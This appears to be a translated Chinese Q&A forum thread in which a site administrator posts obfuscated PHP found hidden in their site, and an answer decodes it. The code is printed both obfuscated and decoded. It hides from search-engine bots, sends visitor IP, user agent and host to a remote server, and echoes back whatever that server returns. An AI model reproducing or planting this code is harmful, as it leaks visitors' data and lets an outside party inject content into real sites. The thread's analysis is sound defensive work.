htaccess中的功能s37有什么作用?

时间:2010-10-27 16:02:38

标签: .htaccess

今天早上发现了一个代码,该代码在我管理的.htaccess网站附带的几个图层下编码。代码如下:

function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"relbmaR" ,"xednaY" ,"revihcra_ai" ,"toBNSM" ,"prulS" ,"elgooG"(yarra = 73u$'));eval(s37('}};lru$ ohce;]1[lru$ = lru$ ;)lru$,"!og!"(edolpxe = lru${))"!og!",lru$(rtsrts( fi;))]"TSOH_PTTH"[REVRES_$(edocnelru."=h&".)3au$(edocnelru."=b&".]"RDDA_ETOMER"[REVRES_$."=i"."?p"."hp.".73c$."/73c$.".73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$."//".":".73h$(stnetnoc_teg_elif@ = lru$ ;)00801+)(emit,)"stats"(5dm,73z$(eikooctes@ { esle }{ )))]73z$[EIKOOC_$(tessi( ro ))3au$ ,"i/" . )73u$ ,"|"(edolpmi . "/"(hctam_gerp((fi'));

显然,该功能的详细信息反向写入。它看起来像是将日志信息发送到远程服务器。熟悉这段代码的人还是它在做什么?

2 个答案:

答案 0 :(得分:1)

看起来非常模糊的统计跟踪代码,但我更倾向于说它是恶意的。如上所述,s37会反转字符串:

function s37($s)
{
    $e = "";
    for ($a = 0; $a <= strlen($s)-1; $a++ )
    {
        $e .= $s{strlen($s)-$a-1};
    }
    return($e);
}

反过来,这会生成以下代码:

$z37="stats";
$h37="http";
$c37="in";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37])))
{

}
else
{
    @setcookie($z37,md5("stats"),time()+10800);
    $url = @file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".$c37/".$c37.".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));
    if (strstr($url,"!go!"))
    {
        $url = explode("!go!",$url);
        $url = $url[1];
        echo $url;

    }

}

用户代理匹配内容可防止搜索引擎机器人运行代码。否则,对于浏览器,会设置cookie,然后从远程服务器下载一些代码并回显。如果没有更多信息,很难确定下载代码的目的。

答案 1 :(得分:0)

函数s37反转提供的字符串。函数s37 doe只用于代码行的第一个小位...